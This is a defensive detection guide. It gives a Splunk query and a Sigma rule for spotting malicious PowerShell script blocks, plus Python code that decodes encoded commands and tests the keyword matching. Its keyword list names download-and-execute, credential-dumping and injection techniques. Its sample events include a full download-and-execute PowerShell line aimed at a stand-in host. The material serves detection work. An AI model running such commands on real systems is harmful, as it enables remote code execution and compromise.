Detecting Suspicious PowerShell Commands

Detection query: Written in SPL (Search Processing Language) for Splunk

index=* (EventCode=4104 OR EventCode=4103)
(ScriptBlockText="*Invoke-Expression*" OR 
 ScriptBlockText="*IEX*" OR 
 ScriptBlockText="*DownloadString*" OR 
 ScriptBlockText="*DownloadFile*" OR 
 ScriptBlockText="*Net.WebClient*" OR 
 ScriptBlockText="*Start-Process*" OR 
 ScriptBlockText="*-EncodedCommand*" OR 
 ScriptBlockText="*-enc*" OR 
 ScriptBlockText="*bypass*" OR 
 ScriptBlockText="*-nop*" OR 
 ScriptBlockText="*hidden*" OR
 ScriptBlockText="*Invoke-Mimikatz*" OR
 ScriptBlockText="*Invoke-ReflectivePEInjection*")
| table _time, host, user, ScriptBlockText
| sort -_time

Explanation:

This query flags PowerShell script block and module logging events (EventCode 4104 and 4103) whose ScriptBlockText contains any of the following keywords, each of which is commonly seen in malicious PowerShell use on a system.

Invoke-Expression: Runs a string as a command or expression 

IEX: Alias for Invoke-Expression

DownloadString: Used in fileless attacks to download and execute scripts or payloads directly into memory without writing to disk first

Net.WebClient/DownloadFile: Used to download malicious payloads from the internet 

Start-Process: Used in attack chains after a payload has been downloaded to execute it with specific parameters, launch processes with elevated privileges, run them hidden from the user, and support persistence or lateral movement

-EncodedCommand: Used to obfuscate malicious PowerShell commands and evade detection

-enc: Shortened form of -EncodedCommand (PowerShell accepts any unambiguous prefix of a parameter name)

bypass: As in -ExecutionPolicy Bypass, disables PowerShell's execution policy, which would usually restrict running unsigned or untrusted scripts

-nop: Short for -NoProfile, which prevents PowerShell from loading user and system profile scripts at startup. Used to avoid logging, evade detection and ensure consistency (malicious code runs without interference from profile configurations)

hidden: As in -WindowStyle Hidden, keeps the PowerShell window from appearing on screen. Gives attackers stealthy execution, reduces suspicion and supports fileless attacks

Invoke-Mimikatz: Invokes the Mimikatz credential dumping tool which allows extraction of plaintext passwords, NTLM hashes, Kerberos tickets, and other credentials directly from memory

Invoke-ReflectivePEInjection: Loads Windows Portable Executable files like DLLs and EXEs directly into memory without writing them to disk. 
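As an added example that is not part of the original page, the following Python decodes an -EncodedCommand / -enc payload the way an analyst would when an alert on these keywords fires. The regex, the function names and the sample command line are assumptions constructed for this example; the facts it relies on are that -EncodedCommand takes Base64 over UTF-16LE text and that PowerShell accepts unambiguous parameter prefixes (-enc, -e, -ec).

```python
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of a parameter name, so the
# encoded-command switch appears as -EncodedCommand, -enc, -e, -ec and so on.
# The regex grabs every "-e..." switch followed by a Base64-looking token;
# _is_encoded_flag() then keeps only the spellings that resolve to it.
_FLAG_RE = re.compile(r"(?<!\S)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def _is_encoded_flag(name: str) -> bool:
    name = name.lower()
    # "-ec" is an explicit alias; any other spelling must be a prefix of
    # "encodedcommand" (this rejects -Encoding, -ExecutionPolicy, ...).
    return name == "ec" or "encodedcommand".startswith(name)


def encode_command(script: str) -> str:
    """Produce what -EncodedCommand expects: Base64 over UTF-16LE text.
    Used here only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(text: str) -> list:
    """Return the decoded script for each encoded-command switch in text.
    A malformed payload yields None in that position so triage can see it."""
    decoded = []
    for flag, payload in _FLAG_RE.findall(text):
        if not _is_encoded_flag(flag):
            continue
        try:
            raw = base64.b64decode(payload, validate=True)
            decoded.append(raw.decode("utf-16-le"))
        except (binascii.Error, UnicodeDecodeError):
            decoded.append(None)
    return decoded


# Constructed sample (not a real log): a hidden, no-profile launch whose
# script body is only visible after decoding.
SAMPLE_SCRIPT = "Invoke-Expression 'Get-Date'"
SAMPLE_COMMAND_LINE = (
    "powershell.exe -NoProfile -WindowStyle Hidden -enc "
    + encode_command(SAMPLE_SCRIPT)
)


def triage(text: str) -> dict:
    """Show what a keyword rule sees before and after decoding."""
    visible = "Invoke-Expression" in text
    decoded = decode_encoded_command(text)
    revealed = any(d is not None and "Invoke-Expression" in d for d in decoded)
    return {
        "raw_mentions_iex": visible,
        "decoded": decoded,
        "decoded_mentions_iex": revealed,
    }


if __name__ == "__main__":
    print(triage(SAMPLE_COMMAND_LINE))
```

The sample makes the point that the keyword rule sees only -enc and hidden in the raw text; Invoke-Expression shows up only after decoding, so decoding belongs in the triage or enrichment step rather than only in the keyword list. Note also that script block logging records the script as executed, after decoding, so the literal -EncodedCommand string is usually found in process command lines (4688 or Sysmon event 1) or in a parent script block that launches a child PowerShell.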

Use the following Sigma rule to convert this query to your preferred query language:

title: Suspicious PowerShell ScriptBlock (Encoded, Download, IEX, Mimikatz, PE Injection)
id: a1b2c3d4-5e6f-7a89-b0c1-d2e3f4567890
status: experimental
description: |
  Detects PowerShell script-block logging events (EventCode 4103/4104) that contain
  common malicious operators such as encoded commands, IEX, web-client downloads,
  hidden execution, or the execution of known post-exploitation modules
  (e.g., Invoke-Mimikatz, Invoke-ReflectivePEInjection). This rule is useful for
  early detection of living-off-the-land binaries (LOLBins) and credential-dumping
  attempts that leverage PowerShell.
author: Damian Perera
date: 2026-01-03
logsource:
  product: windows
  service: powershell
  definition: 'PowerShell Module Logging (Event ID 4103) and Script Block Logging (Event ID 4104)'
detection:
  selection_event:
    EventID:
      - 4103
      - 4104
  selection_keywords:
    ScriptBlockText|contains:
      - 'Invoke-Expression'
      - 'IEX'
      - 'DownloadString'
      - 'DownloadFile'
      - 'Net.WebClient'
      - 'Start-Process'
      - '-EncodedCommand'
      - '-enc'
      - 'bypass'
      - '-nop'
      - 'hidden'
      - 'Invoke-Mimikatz'
      - 'Invoke-ReflectivePEInjection'
  condition: selection_event and selection_keywords
fields:
  - _time
  - host
  - user
  - ScriptBlockText
falsepositives:
  - Legitimate administrative scripts that use encoded commands or web-client
    downloads (e.g., software deployment, patching). Review context and source
    before alerting.
level: high
tags:
  - attack.execution
  - attack.t1059.001      # Command and Scripting Interpreter: PowerShell
  - attack.t1086          # PowerShell (legacy)
  - attack.t1003.001      # OS Credential Dumping: LSASS Memory (for Invoke-Mimikatz)
  - attack.t1064          # Scripting (deprecated)
  - attack.t1055.001      # Process Injection (Reflective PE Injection)
  - attack.t1027          # Obfuscated Files or Information (EncodedCommand, -enc)
  - mitre
  - sigma
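As an added example, not code from the page or its author, the Python below runs the keyword logic shared by the SPL query and the Sigma rule over constructed script block events. It shows three things worth checking before deploying either: matching is case-insensitive (a lower-case iex fires, as Splunk field matching and Sigma's contains modifier are both case-insensitive), the keywords are an any-of list (the SPL joins them with OR, and Sigma's contains over a list means any; contains|all would require every keyword in one script block and match almost nothing), and substring keywords produce false positives (*IEX* matches msiexec, *-enc* matches -Encoding). The event fields, function names and sample events are assumptions.

```python
# Keyword list copied from the SPL query and Sigma rule on this page.
KEYWORDS = [
    "Invoke-Expression", "IEX", "DownloadString", "DownloadFile",
    "Net.WebClient", "Start-Process", "-EncodedCommand", "-enc", "bypass",
    "-nop", "hidden", "Invoke-Mimikatz", "Invoke-ReflectivePEInjection",
]

IN_SCOPE_EVENT_CODES = (4103, 4104)

# Constructed sample events, not real logs. The last one is a process-creation
# event (4688) carrying the same kind of text, included to show that the
# EventCode filter excludes it.
SAMPLE_EVENTS = [
    {"EventCode": 4104, "host": "ws01", "user": "alice",
     "ScriptBlockText": "Get-ChildItem C:\\Users | Sort-Object Length"},
    {"EventCode": 4104, "host": "ws02", "user": "bob",
     "ScriptBlockText": "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    {"EventCode": 4103, "host": "srv01", "user": "svc_deploy",
     "ScriptBlockText": "Start-Process msiexec.exe -ArgumentList '/i agent.msi /qn'"},
    {"EventCode": 4104, "host": "ws03", "user": "carol",
     "ScriptBlockText": "Get-Content log.txt -Encoding UTF8"},
    {"EventCode": 4688, "host": "ws03", "user": "carol",
     "ScriptBlockText": "powershell.exe -nop -w hidden -enc <placeholder>"},
]


def matched_keywords(text, keywords=KEYWORDS):
    """Keywords present in text. Splunk wildcard matches such as
    ScriptBlockText="*IEX*" are case-insensitive, as is Sigma's `contains`,
    so the comparison is done on lower-cased text."""
    lowered = text.lower()
    return [k for k in keywords if k.lower() in lowered]


def matches_any(event, keywords=KEYWORDS):
    """SPL semantics (keywords joined with OR) and Sigma `ScriptBlockText|contains`:
    in-scope event code plus at least one keyword."""
    return (event["EventCode"] in IN_SCOPE_EVENT_CODES
            and bool(matched_keywords(event["ScriptBlockText"], keywords)))


def matches_all(event, keywords=KEYWORDS):
    """Sigma `ScriptBlockText|contains|all` semantics: every keyword must occur
    in the same script block, which almost no real event does."""
    return (event["EventCode"] in IN_SCOPE_EVENT_CODES
            and len(matched_keywords(event["ScriptBlockText"], keywords)) == len(keywords))


def run_detection(events, rule=matches_any):
    """Rows the SPL `table host, user, ScriptBlockText` step would emit, with the
    keywords that fired added for triage."""
    return [
        {"host": e["host"], "user": e["user"],
         "ScriptBlockText": e["ScriptBlockText"],
         "hits": matched_keywords(e["ScriptBlockText"])}
        for e in events if rule(e)
    ]


if __name__ == "__main__":
    for row in run_detection(SAMPLE_EVENTS):
        print(row["host"], row["user"], row["hits"])
```

Running it shows the deployment script on srv01 firing on IEX because of msiexec and carol's Get-Content firing on -enc because of -Encoding, which is the kind of noise the falsepositives section of the rule is warning about; anchoring short keywords with surrounding whitespace or switching to per-keyword regexes is the usual tuning step.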